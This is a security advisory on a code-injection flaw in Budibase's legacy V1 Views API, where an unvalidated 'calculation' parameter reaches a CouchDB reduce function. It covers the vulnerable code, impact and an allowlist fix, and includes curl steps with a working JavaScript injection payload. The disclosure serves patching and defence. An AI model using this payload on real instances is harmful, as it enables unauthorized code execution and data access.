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Security Advisory: CouchDB Reduce Injection via Unsanitized Calculation Parameter in V1 Views API
Affected Software: Budibase Affected Component: packages/server/src/api/controllers/view/viewBuilder.ts, packages/server/src/api/routes/view.ts CWE: CWE-94 (Improper Control of Generation of Code) Discovery Date: 2026-03-24
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Summary
The V1 Views API (POST /api/views) accepts a calculation parameter from the request body that is interpolated directly into a CouchDB reduce function definition without validation. Although an internal SCHEMA_MAP object defines the valid calculation types (sum, count, stats), no actual validation is performed against this map before the value is used in string interpolation.
A user with Builder permissions can inject arbitrary JavaScript code that will be executed within the CouchDB JavaScript engine when the view is queried.
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Affected Component
Route: POST /api/views (V1 legacy views endpoint) File: packages/server/src/api/routes/view.ts, line 45
.post("/api/views", viewController.v1.save)Note: This route has no Joi request body validator, unlike the V2 views endpoint which uses viewValidator().
Vulnerable code: packages/server/src/api/controllers/view/viewBuilder.ts, line 213
const reduction = field && calculation ? { reduce: `_${calculation}` } : {}
return {
meta: { field, tableId, groupBy, filters, schema, calculation, ... },
map: `function (doc) { ... }`,
...reduction, // <-- unvalidated calculation string becomes CouchDB reduce
}---
Vulnerability Detail
The viewBuilder function constructs a CouchDB design document view definition. It correctly sanitizes all inputs that flow into the map function string (using JSON.stringify for field names and a strict TOKEN_MAP allowlist for filter operators).
However, the calculation parameter follows a different path:
- User submits
calculationviaPOST /api/viewsrequest body - No Joi validator is present on this V1 route
viewBuilderreceivescalculationas a raw string- It is interpolated as:
` reduce:_${calculation}` - This reduce definition is saved to a CouchDB design document
- When the view is queried, CouchDB evaluates the reduce value
CouchDB's behavior for reduce functions:
- Values starting with
_followed by a known built-in (_sum,_count,_stats) are executed as native reducers - Any other value is treated as a JavaScript function string and executed in CouchDB's SpiderMonkey JS engine
The SCHEMA_MAP object in the same file defines sum, count, and stats as valid keys, but this map is only used for schema construction - it is never used as an input validator for the calculation parameter.
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Steps to Reproduce
Prerequisites: Authenticated session with Builder role permissions.
1. Send a crafted view creation request:
curl -X POST https://<budibase-instance>/api/views \
-H "Content-Type: application/json" \
-H "Cookie: <builder-session-cookie>" \
-d '{
"name": "test_view",
"tableId": "<valid-table-id>",
"field": "amount",
"calculation": "stats\"); } function(keys,values,rereduce){ var data = \"\"; for(var i in this) { data += i + \"=\" + this[i] + \",\"; } return data; } //"
}'2. Query the created view:
curl https://<budibase-instance>/api/views/test_view?group=true \
-H "Cookie: <builder-session-cookie>"3. Expected result: The injected JavaScript function executes in CouchDB's JS context during reduce evaluation. The function can:
- Enumerate objects available in the CouchDB sandbox
- Access document data from the reduce
valuesparameter - Return arbitrary data in the view response
Simplified test: To verify the injection point without complex payloads:
{
"name": "calc_test",
"tableId": "<valid-table-id>",
"field": "amount",
"calculation": "INVALID_NOT_A_BUILTIN"
}This produces reduce: "_INVALID_NOT_A_BUILTIN". CouchDB will reject this as neither a valid built-in nor a valid function, confirming that arbitrary strings reach the reduce evaluator.
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Impact
- Code execution: Arbitrary JavaScript runs in CouchDB's SpiderMonkey sandbox
- Data access: The reduce function receives all matching document values, allowing data exfiltration across the database
- Scope limitation: CouchDB's JS sandbox prevents filesystem or network access - this is not OS-level RCE
- Authentication required: Attacker must have Builder role, which already grants significant application access
- Persistence: The injected reduce function persists in the design document and executes on every view query
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Recommended Fix
Add an allowlist validation in viewBuilder before the reduce interpolation:
const VALID_CALCULATIONS = ["sum", "count", "stats"];
if (calculation && !VALID_CALCULATIONS.includes(calculation)) {
throw new Error(`Invalid calculation type: ${calculation}`);
}
const reduction = field && calculation ? { reduce: `_${calculation}` } : {};Additionally, add a Joi validator to the V1 views route to match the V2 endpoint:
// In packages/server/src/api/routes/view.ts
.post("/api/views", v1ViewValidator(), viewController.v1.save)---
Additional Context
The V2 views API (POST /api/v2/views) uses viewValidator() with Joi schema validation and a separate calculation handling path. This finding is specific to the V1 legacy endpoint which lacks equivalent input validation.
The map function string in the same code is properly protected - all user inputs reaching it are escaped via JSON.stringify() or validated against a strict TOKEN_MAP allowlist. Only the reduce path is affected.
AnalysisAI
CouchDB reduce injection in Budibase's V1 Views API (POST /api/views) allows authenticated Builder-role users to embed arbitrary JavaScript into CouchDB design document reduce functions via the unsanitized calculation parameter, resulting in code execution within CouchDB's SpiderMonkey sandbox on every subsequent view query. Affected versions are all releases of @budibase/server prior to 3.38.1, confirmed by GHSA-363w-hvwh-w7m6. …
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EUVD-2026-32599
GHSA-363w-hvwh-w7m6